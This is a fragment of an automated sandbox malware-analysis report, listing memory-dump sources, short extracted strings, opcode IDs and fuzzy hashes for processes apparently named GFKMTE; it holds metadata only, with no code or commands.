                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001A.00000002.1504833737.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_26_2_4cb0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001B.00000002.1503624621.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_27_2_2fb0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  • Opcode ID: aebc6b98b2706e3df4cc4c76ae0b356d83c185918787f130eea9b5d306e26f33
                                                                                                                                                  • Instruction ID: 7ec23cc5d258ec49ef74d32ce9669e9d953e95c3102ea55e83d4f7036ebbc00c
                                                                                                                                                  • Opcode Fuzzy Hash: aebc6b98b2706e3df4cc4c76ae0b356d83c185918787f130eea9b5d306e26f33
                                                                                                                                                  • Instruction Fuzzy Hash: D782A174E002298FDB25CF69D894BDDBBB1BF49300F1086A6D509AB265DB34AE85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001B.00000002.1503624621.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_27_2_2fb0000_GFKMTE.jbxd
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001C.00000002.1504404578.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_28_2_18c0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1666749075.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_7550000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,$LRq
                                                                                                                                                  • API String ID: 0-4231502431
                                                                                                                                                  • Opcode ID: 1328f99f0735c104a741cb5d7747f10127a8960113a36ea9e3274bbe314b10cd
                                                                                                                                                  • Instruction ID: 7a81f71b02e3a7a66a8ba93c3cfae8583e2c020f2c8780a07854c2034b6e9307
                                                                                                                                                  • Opcode Fuzzy Hash: 1328f99f0735c104a741cb5d7747f10127a8960113a36ea9e3274bbe314b10cd
                                                                                                                                                  • Instruction Fuzzy Hash: C27290B4E002299FDB65DF68C954BDDBBB2BB89300F1481EAD848A7354DB319E81CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1666749075.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_7550000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,$LRq
                                                                                                                                                  • API String ID: 0-4231502431
                                                                                                                                                  • Opcode ID: 5fbb6bef527fe335d087fc7f6d805f4cc54c2f1e195bbea3bb64526434bb80d8
                                                                                                                                                  • Instruction ID: 68b233eb1b8cd73528b6ce8a3157f79402783134e15e0844ab31110667977547
                                                                                                                                                  • Opcode Fuzzy Hash: 5fbb6bef527fe335d087fc7f6d805f4cc54c2f1e195bbea3bb64526434bb80d8
                                                                                                                                                  • Instruction Fuzzy Hash: 8C7290B4E002299FDB65DF68C954BDDBBB2BB89300F1481EAD848A7354DB319E81CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 0d16db5340ade8e80deee87feb59d85f992677abdc2f97b31986e7fb10e08295
                                                                                                                                                  • Instruction ID: 61dd32c8a9115e087380acc3f8fc3a014736a0ca013a6510bb7324287c11cb9d
                                                                                                                                                  • Opcode Fuzzy Hash: 0d16db5340ade8e80deee87feb59d85f992677abdc2f97b31986e7fb10e08295
                                                                                                                                                  • Instruction Fuzzy Hash: 7A42F270A01258CFEB50DFA8C680A8EFBF2BF49311F55C199D488AB256CB349D85CF65
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 9e78d83c0f3086d8ed1d37ac78bb3f8d86ba02c21480e9a3b151e94ec786dec3
                                                                                                                                                  • Instruction ID: 46f09430bdce185477418f152d195e4190bf841878c7366c403fda7ce3aa4a16
                                                                                                                                                  • Opcode Fuzzy Hash: 9e78d83c0f3086d8ed1d37ac78bb3f8d86ba02c21480e9a3b151e94ec786dec3
                                                                                                                                                  • Instruction Fuzzy Hash: 6732C074900219CFEB50DF69C680A8EFBF2BF48311F55C199D488AB25ACB349D85CFA5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 5aa27bc3c30061813fe27565604dd72fb537e6cab6c948c778da3bdaf0fd7adf
                                                                                                                                                  • Instruction ID: cabf704ac372285d0eedbe506de4084fa76ca5bc4dcbca6e3a9733015041d4ec
                                                                                                                                                  • Opcode Fuzzy Hash: 5aa27bc3c30061813fe27565604dd72fb537e6cab6c948c778da3bdaf0fd7adf
                                                                                                                                                  • Instruction Fuzzy Hash: FF510675E016588FEB58CF6AC84179EBBF3BFC9300F14C0AAD448A7255EB345A858F52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 54e0a1b8fe1d0b2ea2f21ff64c411d2a2228a2a0023aff47de5866d9bee893f2
                                                                                                                                                  • Instruction ID: 0f3e99a6521a126857ac5e8a7375d002ef4470d99977be1991e13cce43a4792c
                                                                                                                                                  • Opcode Fuzzy Hash: 54e0a1b8fe1d0b2ea2f21ff64c411d2a2228a2a0023aff47de5866d9bee893f2
                                                                                                                                                  • Instruction Fuzzy Hash: 00529E74E01219CFEB24CFA9C984B9DBBF2BF48310F1486A9D809A7355D735AA81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 09a5b0845b0d93a3c2c5b132fba660d29e5b74b6ec8c3a6688f472da32517a11
                                                                                                                                                  • Instruction ID: 8e8105f4346a186612c37227442e42fc3dfa393ac504fea2b3d0cdd6657c2e17
                                                                                                                                                  • Opcode Fuzzy Hash: 09a5b0845b0d93a3c2c5b132fba660d29e5b74b6ec8c3a6688f472da32517a11
                                                                                                                                                  • Instruction Fuzzy Hash: BF42C270A002198FDB54CF98CA80A8EFBF6BF88315F59C1A5D448AB265CB34DC85CF95
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be39dd5640e3c1567172bf72646937644d92cb20efcadaf07d9368c5bc3e55db
                                                                                                                                                  • Instruction ID: 10bd859d55ee2ade8f4919bf02232b1dc7bbfea1b74f464c13eb24c252775bb8
                                                                                                                                                  • Opcode Fuzzy Hash: be39dd5640e3c1567172bf72646937644d92cb20efcadaf07d9368c5bc3e55db
                                                                                                                                                  • Instruction Fuzzy Hash: 89429074E01229CFDB64CFA9C984B9DBBB2BF48310F2481A9D809A7355D775AE81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 67b5f96efd1467a7341dd52a9fa0cca36f41c73e35eb88a574455a244c884d8c
                                                                                                                                                  • Instruction ID: ae3a118ed1bfa0d74104a940428c6d2ace26649740cce4bfaa93089f4ccfdf93
                                                                                                                                                  • Opcode Fuzzy Hash: 67b5f96efd1467a7341dd52a9fa0cca36f41c73e35eb88a574455a244c884d8c
                                                                                                                                                  • Instruction Fuzzy Hash: 71428E74E01228CFDB64CFA9C984B9DBBF2BF48310F1481A9E849A7355D775AA81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b6e5461c699a7568d7c12499dfb447db93d34bfaf9c03504473933e2f7bf6b05
                                                                                                                                                  • Instruction ID: baa42b894953c0d82ceda708994a934a2976844dcf6615089270a829b05a6f02
                                                                                                                                                  • Opcode Fuzzy Hash: b6e5461c699a7568d7c12499dfb447db93d34bfaf9c03504473933e2f7bf6b05
                                                                                                                                                  • Instruction Fuzzy Hash: 5532CF70900219CFEB50DFA9C684A8EFBF2BF49211F55C199C488AB256CB34DD81CFA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 920602b293c3c8e7d6b776c00bc30ac77f0b3f74433e6502e2ef67e3e10f5642
                                                                                                                                                  • Instruction ID: 45a44c647e35ccda29b0045f3c7dcd9816582e64bbadce76ddb3fc25363ef0a8
                                                                                                                                                  • Opcode Fuzzy Hash: 920602b293c3c8e7d6b776c00bc30ac77f0b3f74433e6502e2ef67e3e10f5642
                                                                                                                                                  • Instruction Fuzzy Hash: 1D32DF70900219CFEB50DFA9C680A8EFBF2BF48221F55C199D488AB215DB34DD85CFA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ac2462097385ee05882075f904fb6aeb2974e80d7612baecbd7fc47bfac891ad
                                                                                                                                                  • Instruction ID: 1f6a0081c43ffc827c339757d1f6b370077e0a032926e81b0113bfe1d91188fb
                                                                                                                                                  • Opcode Fuzzy Hash: ac2462097385ee05882075f904fb6aeb2974e80d7612baecbd7fc47bfac891ad
                                                                                                                                                  • Instruction Fuzzy Hash: C712E070A002598FEB54CFA9C684A8EFBF2BF88305F15C1A5D448AB265DB34DC85CF95
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5c69c18086b8eddb92e32664b30a05b4b00ee8777ddf9df00c2a9ce262c5ca4
                                                                                                                                                  • Instruction ID: 3b5f1feba2e0bbeedbbeed61314c1e87624f9cb320b4c9b9513d4604bb98b3b5
                                                                                                                                                  • Opcode Fuzzy Hash: b5c69c18086b8eddb92e32664b30a05b4b00ee8777ddf9df00c2a9ce262c5ca4
                                                                                                                                                  • Instruction Fuzzy Hash: 8C12E070A002598FEB54CFA9C684A8EFBF2BF88305F15C1A5D448AB265DB34DC85CF95
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a1cc07fc20a099a8b605026a4f84f4782f2859271b309da670737eda4d0fd914
                                                                                                                                                  • Instruction ID: e3e298ae9f517ed7e4d4a3d215ea3bf72a666885a9d9d7d18ce3351c98022f3e
                                                                                                                                                  • Opcode Fuzzy Hash: a1cc07fc20a099a8b605026a4f84f4782f2859271b309da670737eda4d0fd914
                                                                                                                                                  • Instruction Fuzzy Hash: 2EE10574E002198FDB14DFA8C580AAEBBB2FF89304F248169D554EB35AD735AD42CF61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b1e2d408fb23a73b6e54f0be3cd95a9ef101020eccd1379bae349daadf48a4b
                                                                                                                                                  • Instruction ID: b3cdc526c9fa3fb4ff79ffedd286b6766c66912ec2b72196e45fdc006a4d5452
                                                                                                                                                  • Opcode Fuzzy Hash: 6b1e2d408fb23a73b6e54f0be3cd95a9ef101020eccd1379bae349daadf48a4b
                                                                                                                                                  • Instruction Fuzzy Hash: 6461BA74E01208DFDB54DFAAD994A9DBBF2FF89300F24806AE815AB365DB319941CF14
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: aaba3bfe2282a572fc2ea99e54bc81223ee0aa1a6f91b76bda05d8495533f9a0
                                                                                                                                                  • Instruction ID: d8e0ad16f801e2fb44ab1b9caf34684f60e4cc2fb1f5b29b28c13a4634a3ffeb
                                                                                                                                                  • Opcode Fuzzy Hash: aaba3bfe2282a572fc2ea99e54bc81223ee0aa1a6f91b76bda05d8495533f9a0
                                                                                                                                                  • Instruction Fuzzy Hash: 3341D875E006188FEB58DFAAC84179EBBB3BFC9300F14C0AAD55CA7255EA340A859F51
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 3404754337914f0e563d4d343f5c4e9db0510b44ef3ee55dcfacd49c8e8e5a13
                                                                                                                                                  • Instruction ID: 4a3a9146aee4c6c396ac94c8e94eeb93d7d50179b764920ec8777a118df61934
                                                                                                                                                  • Opcode Fuzzy Hash: 3404754337914f0e563d4d343f5c4e9db0510b44ef3ee55dcfacd49c8e8e5a13
                                                                                                                                                  • Instruction Fuzzy Hash: 9F51A774E012199FDB08CFE9D884AAEFBB2FF88300F14812AE915A7364DB755946CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: c604c044dc254e5fc8dc83af2aaa267b27b5e8adda25a54c197b19d593402012
                                                                                                                                                  • Instruction ID: 50574cf8a962e18fbc742a9d2fc37d845ccc7314dc25638912a3000981d43cdc
                                                                                                                                                  • Opcode Fuzzy Hash: c604c044dc254e5fc8dc83af2aaa267b27b5e8adda25a54c197b19d593402012
                                                                                                                                                  • Instruction Fuzzy Hash: 7351A674E002199FDB18CFA9D884AADFBF2FF88300F14812AE915A7364DB755945CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 6ba3e66fa6b6f7a2bf5271d8e1775da23e1764915f2ac946162d4ecfa01fa698
                                                                                                                                                  • Instruction ID: e1fe383ccc698b337ab73862cd4f22b6a79412987ae64b229c3d816ee0e59d73
                                                                                                                                                  • Opcode Fuzzy Hash: 6ba3e66fa6b6f7a2bf5271d8e1775da23e1764915f2ac946162d4ecfa01fa698
                                                                                                                                                  • Instruction Fuzzy Hash: 6751B674E002199FDB08DFA9D894AADFBF2FF88300F10812AE915AB364DB755946CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: c7d33853884e687d62a29142943c57a5fed7fd296fa52af91e18f1ce33d0a62e
                                                                                                                                                  • Instruction ID: 4a1a2b1b555f37b2e7f6a1edfe0d8dadd61822e73aad97ee65625381e56f4a42
                                                                                                                                                  • Opcode Fuzzy Hash: c7d33853884e687d62a29142943c57a5fed7fd296fa52af91e18f1ce33d0a62e
                                                                                                                                                  • Instruction Fuzzy Hash: C751D774E002189FDB08CFE9D844ADEFBB2BF88300F14812AE915A7364DB755946CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 69831e6343e20fa2c7443dc493fbbbf681bf8ab9b19ca2aaeca945ab28f55d8d
                                                                                                                                                  • Instruction ID: 4ecae4c72979866c82e555b1feb5c519ce56d8bc259d22a2342090702f34c048
                                                                                                                                                  • Opcode Fuzzy Hash: 69831e6343e20fa2c7443dc493fbbbf681bf8ab9b19ca2aaeca945ab28f55d8d
                                                                                                                                                  • Instruction Fuzzy Hash: F951D674E012489FDB18CFE9D884A9EFBB2FF88300F14812AE915AB365DB755946CB50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 3e12e85941b037fbd31905bb10112a256056ece5994f1e5c47fe1a3535a1c906
                                                                                                                                                  • Instruction ID: dce18ccdfbcdbc985cd81db7e8946bf464bb2be89085bcced7271ca00272bffc
                                                                                                                                                  • Opcode Fuzzy Hash: 3e12e85941b037fbd31905bb10112a256056ece5994f1e5c47fe1a3535a1c906
                                                                                                                                                  • Instruction Fuzzy Hash: 1F51C674E002199FDB18DFE9D884A9EFBB2FF88300F108129E915AB368DB755946CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  • Opcode ID: 43afff5b0f72b5f0062a815ba7dd7fe0fa0436e8c1481e428d7216116f0b1e5e
                                                                                                                                                  • Instruction ID: 7ed4e656e4564988ade9bf325234cc214ba30bc250f21d80a79d63555a2a57c2
                                                                                                                                                  • Opcode Fuzzy Hash: 43afff5b0f72b5f0062a815ba7dd7fe0fa0436e8c1481e428d7216116f0b1e5e
                                                                                                                                                  • Instruction Fuzzy Hash: 0481F274E002188FDB04DFA9D584A9EBBF2FF88311F148069E855AB365DB349D42CF64
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  • Opcode ID: f291f112e558133b4d8750b01af8898397c4197641e5bd32570e685eaf6eb0c6
                                                                                                                                                  • Instruction ID: 05da5d9ac811263476497a100c4fc72b7aa71a0d75546602457fe30e15b9ea79
                                                                                                                                                  • Opcode Fuzzy Hash: f291f112e558133b4d8750b01af8898397c4197641e5bd32570e685eaf6eb0c6
                                                                                                                                                  • Instruction Fuzzy Hash: FA81F374E002188FDB04DFA9C584A9EBBF2FF88311F148069E855AB365DB349D42CF64
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 62270e710245380cd5a3e23c226951ef94ab2ebe54309f5e212574ee3dd5b706
                                                                                                                                                  • Instruction ID: 0f3dd82ee097f95b62ba08f24bbb9b4e778d453cf63be09ca9459d971f96dc00
                                                                                                                                                  • Opcode Fuzzy Hash: 62270e710245380cd5a3e23c226951ef94ab2ebe54309f5e212574ee3dd5b706
                                                                                                                                                  • Instruction Fuzzy Hash: 5D61F47490020ADFD718DF99C984AAEFBB6FF88300B658694D8559B355CB34EE81CF90
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1666749075.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_7550000_GFKMTE.jbxd
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3fc33072a612377471aa4ae272b393b5e7edd22dac11b1184ed86f7473d1aae0
                                                                                                                                                  • Instruction ID: bcf0d3a4486b7a8b4d73ad1f3b0201f1d5b6c93f09928dc24481c7d5456a0aee
                                                                                                                                                  • Opcode Fuzzy Hash: 3fc33072a612377471aa4ae272b393b5e7edd22dac11b1184ed86f7473d1aae0
                                                                                                                                                  • Instruction Fuzzy Hash: 303118B1E042098FDB08CFAAC9946AEFBF2FF89301F14C16AD459A72A5D7744A41CB54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
